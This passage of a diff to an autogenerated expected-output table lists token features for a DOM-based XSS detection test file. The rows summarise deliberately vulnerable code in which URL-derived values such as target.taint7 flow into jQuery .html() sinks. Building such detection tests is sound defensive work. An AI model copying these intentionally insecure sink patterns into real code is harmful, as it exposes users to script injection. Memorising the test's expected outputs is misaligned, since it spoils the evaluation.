autogenerated/Xss/DomBasedXss/tst.js:405:18:405:39 | target. ... "safe" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:25:405:30 | taint7 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:25:405:30 | taint7 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:25:405:30 | taint7 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:25:405:30 | taint7 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:25:405:30 | taint7 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:34:405:39 | "safe" | assignedToPropName | taint7 | +| autogenerated/Xss/DomBasedXss/tst.js:405:34:405:39 | "safe" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:34:405:39 | "safe" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:34:405:39 | "safe" | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:34:405:39 | "safe" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:34:405:39 | "safe" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | $('myId ... taint7) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | $('myId ... taint7) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | $('myId ... taint7) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | $('myId ... taint7) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | $('myId ... taint7) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | exceptional return of $('myId ... taint7) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | exceptional return of $('myId ... taint7) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | exceptional return of $('myId ... taint7) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | exceptional return of $('myId ... taint7) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:3:406:31 | exceptional return of $('myId ... taint7) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:406:5:406:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:406:5:406:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:406:5:406:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17485,6 +121615,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:406:5:406:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:406:5:406:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:406:5:406:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:13:406:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:13:406:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:13:406:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:13:406:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:13:406:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:18:406:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:18:406:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:18:406:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:18:406:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:18:406:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:406:18:406:30 | target.taint7 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:406:18:406:30 | target.taint7 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:406:18:406:30 | target.taint7 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17492,6 +121632,77 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:406:18:406:30 | target.taint7 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:406:18:406:30 | target.taint7 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:406:18:406:30 | target.taint7 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:406:25:406:30 | taint7 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:406:25:406:30 | taint7 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:406:25:406:30 | taint7 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:406:25:406:30 | taint7 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:406:25:406:30 | taint7 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:15 | target.taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:15 | target.taint8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:15 | target.taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:15 | target.taint8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:15 | target.taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:31 | target. ... .taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:31 | target. ... .taint8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:31 | target. ... .taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:31 | target. ... .taint8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:3:408:31 | target. ... .taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:10:408:15 | taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:10:408:15 | taint8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:10:408:15 | taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:10:408:15 | taint8 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:10:408:15 | taint8 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:24 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:24 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:24 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:24 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:24 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:31 | target.taint8 | assignedToPropName | taint8 | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:31 | target.taint8 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:31 | target.taint8 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:408:19:408:31 | target.taint8 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint 